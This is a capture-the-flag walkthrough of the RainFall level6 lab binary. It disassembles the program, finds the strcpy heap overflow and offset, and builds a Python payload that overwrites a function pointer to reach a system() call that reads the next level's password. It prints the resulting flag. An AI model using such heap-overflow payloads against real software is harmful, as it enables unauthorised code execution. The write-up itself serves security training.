#+title: Walkthrough
* Data Gathering
** Strings
#+begin_src shell
readelf -p.rodata $USER

String dump of section '.rodata':
  [     8]  /bin/cat /home/user/level7/.pass
  [    29]  Nope
#+end_src
** Functions
#+begin_src shell :tangle no

All defined functions:

Non-debugging symbols:
0x080482f4  _init
0x08048340  strcpy# Unsecure
0x08048340  strcpy@plt
0x08048350  malloc
0x08048350  malloc@plt
0x08048360  puts
0x08048360  puts@plt
0x08048370  system
0x08048370  system@plt# may use /bin/cat ...
0x08048380  __gmon_start__
0x08048380  __gmon_start__@plt
0x08048390  __libc_start_main
0x08048390  __libc_start_main@plt
0x080483a0  _start
0x080483d0  __do_global_dtors_aux
0x08048430  frame_dummy
0x08048454  n#Interesting one
0x08048468  m#
0x0804847c  main#
0x080484e0  __libc_csu_init
0x08048550  __libc_csu_fini
0x08048552  __i686.get_pc_thunk.bx
0x08048560  __do_global_ctors_aux
0x0804858c  _fini
#+end_src

** Global vars
#+begin_src shell :tangle no
All defined variables:

Non-debugging symbols:
0x080485a8  _fp_hw
0x080485ac  _IO_stdin_used
0x0804871c  __FRAME_END__
0x08049720  __CTOR_LIST__
0x08049720  __init_array_end
0x08049720  __init_array_start
0x08049724  __CTOR_END__
0x08049728  __DTOR_LIST__
0x0804972c  __DTOR_END__
0x08049730  __JCR_END__
0x08049730  __JCR_LIST__
0x08049734  _DYNAMIC
0x08049800  _GLOBAL_OFFSET_TABLE_
0x08049824  __data_start
0x08049824  data_start
0x08049828  __dso_handle
0x0804982c  completed.6159
0x08049830  dtor_idx.6161
#+end_src
* Binary Analisis
** Functions
#+begin_src shell :tangle no
  level6@RainFall:~$ gdb ./$USER -q -batch -ex 'set disassembly-flavor intel' -ex "disassemble main" -ex "disassemble m" -ex "disassemble n"
Dump of assembler code for function main:
   0x0804847c <+0>:	push   ebp
   0x0804847d <+1>:	mov    ebp,esp
   0x0804847f <+3>:	and    esp,0xfffffff0
   0x08048482 <+6>:	sub    esp,0x20
   0x08048485 <+9>:	mov    DWORD PTR [esp],0x40
   0x0804848c <+16>:	call   0x8048350 <malloc@plt>
   0x08048491 <+21>:	mov    DWORD PTR [esp+0x1c],eax
   0x08048495 <+25>:	mov    DWORD PTR [esp],0x4
   0x0804849c <+32>:	call   0x8048350 <malloc@plt>
   0x080484a1 <+37>:	mov    DWORD PTR [esp+0x18],eax
   0x080484a5 <+41>:	mov    edx,0x8048468
   0x080484aa <+46>:	mov    eax,DWORD PTR [esp+0x18]
   0x080484ae <+50>:	mov    DWORD PTR [eax],edx
   0x080484b0 <+52>:	mov    eax,DWORD PTR [ebp+0xc]
   0x080484b3 <+55>:	add    eax,0x4
   0x080484b6 <+58>:	mov    eax,DWORD PTR [eax]
   0x080484b8 <+60>:	mov    edx,eax
   0x080484ba <+62>:	mov    eax,DWORD PTR [esp+0x1c]
   0x080484be <+66>:	mov    DWORD PTR [esp+0x4],edx
   0x080484c2 <+70>:	mov    DWORD PTR [esp],eax
   0x080484c5 <+73>:	call   0x8048340 <strcpy@plt>
   0x080484ca <+78>:	mov    eax,DWORD PTR [esp+0x18]
   0x080484ce <+82>:	mov    eax,DWORD PTR [eax]
   0x080484d0 <+84>:	call   eax
   0x080484d2 <+86>:	leave  
   0x080484d3 <+87>:	ret    
End of assembler dump.
Dump of assembler code for function m:
   0x08048468 <+0>:	push   ebp
   0x08048469 <+1>:	mov    ebp,esp
   0x0804846b <+3>:	sub    esp,0x18
   0x0804846e <+6>:	mov    DWORD PTR [esp],0x80485d1
   0x08048475 <+13>:	call   0x8048360 <puts@plt>
   0x0804847a <+18>:	leave  
   0x0804847b <+19>:	ret    
End of assembler dump.
Dump of assembler code for function n:
   0x08048454 <+0>:	push   ebp
   0x08048455 <+1>:	mov    ebp,esp
   0x08048457 <+3>:	sub    esp,0x18
   0x0804845a <+6>:	mov    DWORD PTR [esp],0x80485b0
   0x08048461 <+13>:	call   0x8048370 <system@plt>
   0x08048466 <+18>:	leave  
   0x08048467 <+19>:	ret    
End of assembler dump.
#+end_src
** Source
[[source]]
** Get offset

#+begin_src shell
 ltrace ./$USER < /tmp/$USER
__libc_start_main(0x804847c, 1, 0xbffffd14, 0x80484e0, 0x8048550 <unfinished ...>
malloc(64)                                       = 0x0804a008
malloc(4)                                        = 0x0804a050
strcpy(0x0804a008, NULL <unfinished ...>
#+end_src
#+begin_src shell :tangle no
  the offset is 0x48 -> 4 * 16 +8 = 64 + 8 = 72
  offset=64
  va_n=0x08048454
#+end_src
*** Why start at 0x....08
**** First check the mapping
#+begin_src shell :tangle no
info proc map
process 2560
Mapped address spaces:

	Start Addr   End Addr       Size     Offset objfile
	 0x8048000  0x8049000     0x1000        0x0 /home/user/level6/level6
	 0x8049000  0x804a000     0x1000        0x0 /home/user/level6/level6
	 0x804a000  0x806b000    0x21000        0x0 [heap]
	0xb7e2b000 0xb7e2c000     0x1000        0x0 
	0xb7e2c000 0xb7fcf000   0x1a3000        0x0 /lib/i386-linux-gnu/libc-2.15.so
	0xb7fcf000 0xb7fd1000     0x2000   0x1a3000 /lib/i386-linux-gnu/libc-2.15.so
	0xb7fd1000 0xb7fd2000     0x1000   0x1a5000 /lib/i386-linux-gnu/libc-2.15.so
	0xb7fd2000 0xb7fd5000     0x3000        0x0 
	0xb7fdb000 0xb7fdd000     0x2000        0x0 
	0xb7fdd000 0xb7fde000     0x1000        0x0 [vdso]
	0xb7fde000 0xb7ffe000    0x20000        0x0 /lib/i386-linux-gnu/ld-2.15.so
	0xb7ffe000 0xb7fff000     0x1000    0x1f000 /lib/i386-linux-gnu/ld-2.15.so
	0xb7fff000 0xb8000000     0x1000    0x20000 /lib/i386-linux-gnu/ld-2.15.so
	0xbffdf000 0xc0000000    0x21000        0x0 [stack]
#+end_src
**** Second check the va
#+begin_src shell :tangle no
  x/50wx 0x0804a000
  #             [Meta data               ]      [First malloc
  0x804a000:	0x00000000	0x00000049	0x00000000	0x00000000
  0x804a010:	0x00000000	0x00000000	0x00000000	0x00000000
  0x804a020:	0x00000000	0x00000000	0x00000000	0x00000000
  0x804a030:	0x00000000	0x00000000	0x00000000	0x00000000
  #                      End First malloc]      [Meta data               ]
  0x804a040:	0x00000000	0x00000000	0x00000000	0x00000011
  #           [two malloc]      [Meta data                               ]
  0x804a050:	0x00000000	0x00000000	0x00000000	0x00020fa9
  x/3wx 0x0804a054
  0x804a054:	0x00000000	0x00000000	0x00020fa9
#+end_src

** Explotation idea
"Fill with "B" or 42 and put the va n.
#+begin_src shell :tangle no
  python -c 'print "B"*68 + "\x08\x04\x84\x54"[::-1]'
#+end_src
*** Verify
#+begin_src shell :tangle no
  x/3wx 0x0804a04c
    0x804a04c:	0x42424242	0x08048454	0x00000000
  info symbol 	0x08048454
  n in section .text of /home/user/level6/level6
  (gdb) x/10i 	0x08048454
     0x8048454 <n>:	push   ebp
     0x8048455 <n+1>:	mov    ebp,esp
     0x8048457 <n+3>:	sub    esp,0x18
     0x804845a <n+6>:	mov    DWORD PTR [esp],0x80485b0
     0x8048461 <n+13>:	call   0x8048370 <system@plt>
     0x8048466 <n+18>:	leave  
     0x8048467 <n+19>:	ret    
     0x8048468 <m>:	push   ebp
     0x8048469 <m+1>:	mov    ebp,esp
     0x804846b <m+3>:	sub    esp,0x18

  (gdb) c
  Continuing.
  /bin/cat: /home/user/level7/.pass: Permission denied
  [Inferior 1 (process 2622) exited normally]
#+end_src
* Explotation
#+begin_src shell
./$USER $(cat /tmp/$USER)
f73dcb7a06f60e3ccc608990b0a046359d42a1a0489ffeefd0d9cb2d7c9cb82d
#+end_src
